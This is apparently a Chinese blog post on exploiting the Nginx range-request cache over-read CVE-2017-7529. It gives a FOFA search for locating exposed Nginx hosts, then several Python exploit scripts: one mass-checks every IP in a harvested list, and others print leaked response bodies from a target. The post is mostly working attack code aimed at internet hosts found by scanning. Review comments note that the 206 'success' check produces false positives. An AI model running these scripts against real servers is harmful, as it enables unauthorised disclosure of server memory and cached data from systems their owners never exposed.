参考:
- Nginx越界读取缓存漏洞 CVE-2017-7529 | PeiQi文库 (wgpsec.org)
- Nginx越界读取缓存漏洞(CVE-2017-7529)复现分析 - qweg_focus - 博客园 (cnblogs.com)
一、fofa 搜索
nginx && port="80"
我这里写了个脚本将ip保存下来,搜索ip脚本的编写教程:Python教程:如何用Python编写FOFA爬虫获取信息?_fofa python-CSDN博客
二、漏洞复现
漏洞poc
#!/usr/bin/env python
import sys
import requests
# Usage guard: the script takes the target base URL as its only argument.
if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
# Fixed number of bytes added to the measured body length to build the Range suffix.
offset = 605
url = sys.argv[1]
# First request: measure the length of the normal (un-ranged) response body.
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
# Second request: two suffix (negative) ranges whose lengths sum to
# 0x8000000000000000 (2**63).
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
# NOTE(review): ``r`` is never inspected or printed; the script ends right after
# sending the ranged request, so it gives no indication of the outcome on its own.
我根据poc重写了脚本,读取本地的ip.txt文件进行验证漏洞
#!/usr/bin/env python
import requests
def check_vulnerability(url):
    """
    Probe ``url`` for CVE-2017-7529 and report the outcome as a boolean.

    Two requests are sent: a plain GET to measure the normal body length, then a
    GET carrying a ``Range`` header with two suffix ranges derived from that
    length. The second response is judged by status code and body presence only.

    Args:
        url (str): The URL to probe; passed to ``requests.get`` unchanged.

    Returns:
        bool: True when the ranged request returns HTTP 206 with a non-empty
        body, False otherwise (including on any ``requests.RequestException``).

    NOTE(review): HTTP 206 with a body is the ordinary reply to any satisfiable
    Range request, so a True result is a heuristic, not proof of the over-read;
    expect false positives on unaffected servers.
    """
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
    }
    offset = 605  # bytes added to the measured body length to build the Range suffix
    try:
        # First request: measure the length of the normal response body.
        response = requests.get(url, headers=headers, timeout=10)
        file_len = len(response.content)
        n = file_len + offset
        # Second request: two suffix ranges whose lengths sum to 0x8000000000000000 (2**63).
        headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)
        r = requests.get(url, headers=headers, timeout=10)
        # Heuristic check: partial content with a non-empty body counts as a hit.
        if r.status_code == 206 and r.content:
            return True
    except requests.RequestException as e:
        # Network/HTTP errors are swallowed: the URL is simply reported as not
        # vulnerable. ``e`` is bound but unused unless the print below is re-enabled.
        pass
        # print(f"请求错误: {e}")
    return False
def main():
    """
    Read one URL per line from ``ip.txt`` and print each one that
    ``check_vulnerability`` reports as a hit.

    Lines are only stripped of surrounding whitespace; nothing else is
    validated, so a blank line is passed on as an empty URL (requests should
    reject that with a ``RequestException``, which ``check_vulnerability``
    swallows and reports as False).
    """
    # Load the target list; the file is opened with the platform default encoding.
    with open('ip.txt', 'r') as file:
        urls = [line.strip() for line in file]
    # Probe each entry and report only the hits.
    for url in urls:
        # print(f"正在验证的URL: {url}")
        if check_vulnerability(url):
            print(f"验证成功的URL: {url}")
# Script entry point: run the file-driven check only when executed directly.
if __name__ == "__main__":
    main()
三、利用漏洞
poc
import requests
import urllib3
def cve20177529():
    """
    Send the CVE-2017-7529 probe to the hard-coded local URL and print the
    status code and body of the ranged response.

    TLS verification is disabled and redirects are not followed for both
    requests. Any exception is caught and printed rather than propagated.
    """
    try:
        # Request headers for the baseline request.
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = 'http://127.0.0.1:8080/'
        # Baseline request to measure the normal body length.
        # verify=False skips TLS certificate validation; allow_redirects=False keeps a
        # redirect from being followed and skewing the measured length.
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        url_len = len(r1.content)
        # Extend the measured length by a fixed amount.
        addnum = 320
        final_len = url_len + addnum
        # NOTE(review): stray no-op statement (a bare integer constant, 2**63) left
        # over from editing; it evaluates and discards the value and has no effect.
        0x8000000000000000
        # Fresh header dict: same User-Agent plus a Range header with two suffix
        # ranges whose lengths sum to 0x8000000000000000.
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
            'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
        }
        # Send the ranged request with the new headers and print what came back.
        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        text = r2.text
        code = r2.status_code
        print(code)  # status code
        print(text)  # response body
    except Exception as result:
        # Broad catch: any failure is printed and swallowed.
        print(result)
# Script entry point: silence urllib3's InsecureRequestWarning (the probe sends
# requests with verify=False) and run the probe once.
if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()
我用这个poc时,目标返回302重定向,没有获取到目标信息,于是我又改了一下
import requests
import urllib3
def cve20177529():
    """
    Send the CVE-2017-7529 probe to the hard-coded ``url`` and print the
    status code and body of the ranged response.

    Differs from the earlier variant in following redirects
    (``allow_redirects=True``) on both requests, so the measured length and the
    printed response come from wherever the redirect chain ends, not
    necessarily from ``url`` itself. TLS verification is disabled. Any
    exception is caught and printed rather than propagated.
    """
    try:
        # Browser-like User-Agent for the baseline request.
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = 'http://xxxx'  # target URL placeholder
        # Baseline request to measure the normal body length (redirects followed).
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=True)
        url_len = len(r1.content)
        # Extend the measured length by a fixed amount.
        addnum = 320
        final_len = url_len + addnum
        # Add a Range header with two suffix ranges whose lengths sum to
        # 0x8000000000000000 (2**63).
        headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
        # Ranged request; redirects are followed here too.
        # NOTE(review): whether the Range header is carried across a redirect hop
        # depends on requests' redirect handling — confirm before relying on it.
        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=True)
        text = r2.text
        code = r2.status_code
        # Print status code and body.
        print(f"Status Code: {code}")
        print("Response Body:")
        print(text)
    except Exception as e:
        # Broad catch: any failure is printed and swallowed.
        print(f"An error occurred: {e}")
# Script entry point: silence urllib3's InsecureRequestWarning (the probe sends
# requests with verify=False) and run the probe once.
if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()
状态码 206
表示“部分内容”(Partial Content),通常是在服务器处理了部分范围请求时返回的。